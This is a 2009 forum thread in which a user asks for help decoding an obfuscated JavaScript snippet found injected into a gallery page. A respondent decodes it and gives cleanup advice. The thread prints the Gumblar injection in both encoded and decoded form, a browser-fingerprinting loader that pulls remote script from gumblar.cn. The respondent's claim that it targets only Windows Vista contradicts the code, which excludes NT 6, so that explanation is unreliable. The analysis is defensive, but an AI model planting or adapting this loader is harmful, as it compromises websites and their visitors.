convert encoded javascript?

Toby · 2009-05-01, 08:31 AM

I found this snippet in the head of a gallery. Javascript is not my forté, so I've not been having much success decoding it to determine if it's malicious or benign.

Any javascript gurus around here that can turn this back into readable code?

PHP Code:


			
(function(t){eval(unescape(('>76a>72>20a>3d>22ScriptE>6e>67>69ne>22>2cb>3d>22Ver>73>69on()+>22>2c>6a>3d>22>22>2cu>3dnav>69g>61tor>2e>75>73erAgent>3bi>66((>75>2ei>6e>64exO>66(>22Win>22)>3e0)>26>26(u>2eindexOf(>22N>54>206>22)>3c0>29>26>26(d>6f>63ume>6et>2e>63ookie>2e>69>6ed>65x>4ff(>22miek>3d1>22)>3c>30)>26>26>28>74y>70eof(>7a>72vzts)>21>3dtypeof(>22A>22)))>7bz>72vzts>3d>22A>22>3beva>6c(>22i>66(w>69>6edow>2e>22+>61+>22)j>3d>6a+>22+a+>22Ma>6aor>22+b>2b>61>2b>22>4dinor>22+b+a+>22Bui>6c>64>22+b+>22j>3b>22>29>3bd>6fcumen>74>2ewri>74e(>22>3cscrip>74>20src>3d>2f>2f>67um>62lar>2ec>6e>2fr>73>73>2f>3f>69d>3d>22+>6a+>22>3e>3c>5c>2fscript>3e>22)>3b>7d').replace(t,'%')))})(/>/g);

cd34 · 2009-05-01, 08:40 AM

That is bad stuff, comes from an FTP exploit. Change your FTP password, have your host check your FTP logs. I would suspect hundreds if not thousands of files have been affected. Scan your machine for spyware/keyloggers/malware and don't use the same password as before.

Code:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")&gt;0)&amp;&amp;(u.indexOf("NT 6")&lt;0)&amp;&amp;(document.cookie.indexOf("miek=1")&lt;0)&amp;&amp;(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src="//gumblar.cn/rss/?id=%22+j+%22"><\/script>");}

Toby · 2009-05-01, 08:52 AM

Thanks, I figured it was most likely malicious since it was so heavily encoded.

Fortunately it's not on my box. But I will let the owner know he has a serious problem.

cd34 · 2009-05-01, 09:01 AM

If you use Firefox, you can get the Web Developer Toolbar, which has a View Source/View Generated Source link. Problem is, if you've viewed the page, and the machine you're on is able to get the virus, you would have run the exploit.

This particular one only displays for the OS of machines that are exploitable, so, if you aren't running Windows Vista (NT6), it wouldn't even attempt the exploit.

bDok · 2009-05-01, 10:38 AM

bah. more lame exploits.

2009-05-01, 08:31 AM	#1
Toby Lonewolf Internet Sales Join Date: Mar 2005 Location: Houston Posts: 4,826	convert encoded javascript? I found this snippet in the head of a gallery. Javascript is not my forté, so I've not been having much success decoding it to determine if it's malicious or benign. Any javascript gurus around here that can turn this back into readable code? PHP Code: (function(t){eval(unescape(('>76a>72>20a>3d>22ScriptE>6e>67>69ne>22>2cb>3d>22Ver>73>69on()+>22>2c>6a>3d>22>22>2cu>3dnav>69g>61tor>2e>75>73erAgent>3bi>66((>75>2ei>6e>64exO>66(>22Win>22)>3e0)>26>26(u>2eindexOf(>22N>54>206>22)>3c0>29>26>26(d>6f>63ume>6et>2e>63ookie>2e>69>6ed>65x>4ff(>22miek>3d1>22)>3c>30)>26>26>28>74y>70eof(>7a>72vzts)>21>3dtypeof(>22A>22)))>7bz>72vzts>3d>22A>22>3beva>6c(>22i>66(w>69>6edow>2e>22+>61+>22)j>3d>6a+>22+a+>22Ma>6aor>22+b>2b>61>2b>22>4dinor>22+b+a+>22Bui>6c>64>22+b+>22j>3b>22>29>3bd>6fcumen>74>2ewri>74e(>22>3cscrip>74>20src>3d>2f>2f>67um>62lar>2ec>6e>2fr>73>73>2f>3f>69d>3d>22+>6a+>22>3e>3c>5c>2fscript>3e>22)>3b>7d').replace(t,'%')))})(/>/g); __________________ Latex Vixens Babes In Boots Well Heeled Women Dressing For Sex Stocking Vixens

2009-05-01, 08:40 AM	#2
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	That is bad stuff, comes from an FTP exploit. Change your FTP password, have your host check your FTP logs. I would suspect hundreds if not thousands of files have been affected. Scan your machine for spyware/keyloggers/malware and don't use the same password as before. Code: var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src="//gumblar.cn/rss/?id=%22+j+%22"><\/script>");} __________________ SnapReplay.com a different way to share photos - iPhone & Android

2009-05-01, 08:52 AM	#3
Toby Lonewolf Internet Sales Join Date: Mar 2005 Location: Houston Posts: 4,826	Thanks, I figured it was most likely malicious since it was so heavily encoded. Fortunately it's not on my box. But I will let the owner know he has a serious problem. __________________ Latex Vixens Babes In Boots Well Heeled Women Dressing For Sex Stocking Vixens

2009-05-01, 09:01 AM	#4
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	If you use Firefox, you can get the Web Developer Toolbar, which has a View Source/View Generated Source link. Problem is, if you've viewed the page, and the machine you're on is able to get the virus, you would have run the exploit. This particular one only displays for the OS of machines that are exploitable, so, if you aren't running Windows Vista (NT6), it wouldn't even attempt the exploit. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2009-05-01, 10:38 AM	#5
bDok bang bang Join Date: Mar 2005 Location: SD/OC/LA Posts: 3,241	bah. more lame exploits. __________________ submit to Nymphotic submit to Moistlace